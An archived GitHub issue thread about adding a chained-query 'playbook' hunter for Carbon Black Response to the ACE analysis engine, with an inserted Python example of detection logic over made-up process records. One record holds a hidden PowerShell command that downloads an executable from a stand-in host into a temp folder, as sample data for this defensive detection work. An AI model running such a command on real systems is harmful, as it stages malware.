This repository has been archived by the owner on Oct 10, 2019. It is now read-only.

CbR Advanced Query Hunter #235

Open
seanmcfeely opened this issue Apr 17, 2019 · 2 comments
Assignees
Labels
enhancement New feature or request

Comments

@seanmcfeely (Contributor)

In some cases, it's desirable to perform some additional CbR process inspection on process or process tree events before firing a detection. It's also desirable to chain together queries and process inspections like a "playbook" and then only fire a detection if all conditions are met.

Example:
Base query/playbook starting point:

process_name:iexplore.exe cmdline:.mht* childproc_name:iexplore.exe

All results from that query would be sent to ACE for analysis (analysis mode) and this CbR Advanced Query Hunter would pick up that analysis.
For this example, the child process of each process result would be inspected to see if an XML file was written. If so, then that would be the detection for this specific example and the ACE analysis would become an Alert and enter correlation mode.

Some things to note:
We will not want this module to work on every process guid observable, so some method should be used for signaling ACE to use this CbR Advanced Query Hunter module. Also, it makes no sense for every "playbook" script to be run against incoming results. For this reason, ACE should manage the "playbooks" from start to finish, aka handle the CbR queries itself through cbinterface. I'm thinking that the playbooks are defined in config files and maintained outside of the ACE project itself as they would be considered intel.

@seanmcfeely seanmcfeely added the enhancement New feature or request label Apr 17, 2019
@seanmcfeely seanmcfeely self-assigned this Apr 17, 2019
@seanmcfeely (Contributor, Author)

Additional ideas:

Can apply directionality to filemods that will allow detection based on wrote/deleted.

Can detect service installations by looking to see if a file was recently written and then launched by services.exe a short time later. Then, can correlate back to the source that wrote the exe.
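Both ideas in this thread, the chained .mht/.xml playbook from the opening post and the filemod directionality plus service-installation correlation from the follow-up comment, as one constructed Python example. This is added illustration, not ACE or cbinterface code: the process records are made up, the base CbR query is approximated in Python rather than sent to CbR, and the pipe-delimited filemod layout and its operation codes (2 first write, 8 last write, 4 delete) are an assumption about the CbR filemod_complete format.

```python
"""Chained "playbook" detection over CbR-style process records.

Constructed example, not ACE or cbinterface code. Each process is a dict
imitating a few fields of a CbR process document. Filemod strings use the
layout assumed here for CbR's filemod_complete field:
operation|timestamp|path|md5|filetype|tamper (2 = first write,
8 = last write, 4 = delete). All sample data below is made up.
"""
from datetime import datetime

FILEMOD_WROTE = {2, 8}      # first write / last write -> direction "wrote"
FILEMOD_DELETED = {4}       # delete -> direction "deleted"

# Constructed process documents keyed by a made-up process id.
PROCESSES = {
    "p1": {"process_name": "iexplore.exe", "parent_name": "explorer.exe",
           "path": r"C:\Program Files\Internet Explorer\iexplore.exe",
           "cmdline": r'"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\bob\Downloads\invoice.mht',
           "start": "2019-04-17T10:00:00", "children": ["p2"], "filemod_complete": []},
    "p2": {"process_name": "iexplore.exe", "parent_name": "iexplore.exe",
           "path": r"C:\Program Files\Internet Explorer\iexplore.exe",
           "cmdline": r'"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1234 CREDAT:75777',
           "start": "2019-04-17T10:00:01", "children": [], "filemod_complete": [
               r"2|2019-04-17T10:00:05|C:\Users\bob\AppData\Local\Temp\stage.xml|d41d8cd98f00b204e9800998ecf8427e|0|false",
               r"4|2019-04-17T10:00:09|C:\Users\bob\AppData\Local\Temp\stage.xml||0|false"]},
    "p3": {"process_name": "powershell.exe", "parent_name": "cmd.exe",
           "path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
           "cmdline": r"powershell.exe -nop -w hidden -c iwr http://example.invalid/u -OutFile C:\Windows\Temp\updater.exe",
           "start": "2019-04-17T10:01:00", "children": [], "filemod_complete": [
               r"8|2019-04-17T10:01:10|C:\Windows\Temp\updater.exe|9e107d9d372bb6826bd81d3542a419d6|2|false"]},
    "p4": {"process_name": "updater.exe", "parent_name": "services.exe",
           "path": r"C:\Windows\Temp\updater.exe", "cmdline": r"C:\Windows\Temp\updater.exe",
           "start": "2019-04-17T10:01:40", "children": [], "filemod_complete": []},
    "p5": {"process_name": "spoolsv.exe", "parent_name": "services.exe",
           "path": r"C:\Windows\System32\spoolsv.exe", "cmdline": r"C:\Windows\System32\spoolsv.exe",
           "start": "2019-04-17T10:02:00", "children": [], "filemod_complete": []},
}


def filemods(proc):
    """Yield (direction, time, lowercased path), applying wrote/deleted directionality."""
    for raw in proc["filemod_complete"]:
        op, ts, path = raw.split("|")[:3]
        op = int(op)
        if op in FILEMOD_WROTE:
            yield "wrote", datetime.fromisoformat(ts), path.lower()
        elif op in FILEMOD_DELETED:
            yield "deleted", datetime.fromisoformat(ts), path.lower()


def base_query_hits(procs):
    """Python stand-in for:  process_name:iexplore.exe cmdline:.mht* childproc_name:iexplore.exe"""
    for pid, p in procs.items():
        if (p["process_name"].lower() == "iexplore.exe" and ".mht" in p["cmdline"].lower()
                and any(procs[c]["process_name"].lower() == "iexplore.exe" for c in p["children"])):
            yield pid


def mht_xml_playbook(procs):
    """Playbook step 2: promote a base-query hit only if a child iexplore.exe wrote an .xml file."""
    detections = []
    for pid in base_query_hits(procs):
        for cid in procs[pid]["children"]:
            xml = sorted({path for d, _, path in filemods(procs[cid])
                          if d == "wrote" and path.endswith(".xml")})
            if xml:
                detections.append({"parent": pid, "child": cid, "xml_written": xml})
    return detections


def service_install_playbook(procs, window_s=300):
    """Flag a services.exe child whose image was written within window_s before it started,
    and correlate back to the process that wrote it."""
    writes = {}                                   # lowercased path -> [(time, writer pid)]
    for pid, p in procs.items():
        for d, t, path in filemods(p):
            if d == "wrote":
                writes.setdefault(path, []).append((t, pid))
    hits = []
    for pid, p in procs.items():
        if p["parent_name"].lower() != "services.exe":
            continue
        start = datetime.fromisoformat(p["start"])
        for t, writer in writes.get(p["path"].lower(), []):
            delay = (start - t).total_seconds()
            if 0 <= delay <= window_s:
                hits.append({"service": pid, "writer": writer, "path": p["path"], "delay_s": delay})
    return hits


if __name__ == "__main__":
    print(mht_xml_playbook(PROCESSES))
    print(service_install_playbook(PROCESSES))
```

In the real design sketched above the base query would be run against CbR through cbinterface and only its results would reach the second step; here that step is simulated so the chaining and the alert-only-when-all-conditions-hold behaviour can be run offline. Note that the deleted stage.xml still counts as a write because directionality is evaluated per event, not on the file's final state.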

@unixfreak0037 (Collaborator)

As privately discussed, this is already possible by submitting analysis requests with analysis mode set to "analysis", and then adding a detection point in your new module if you find something.
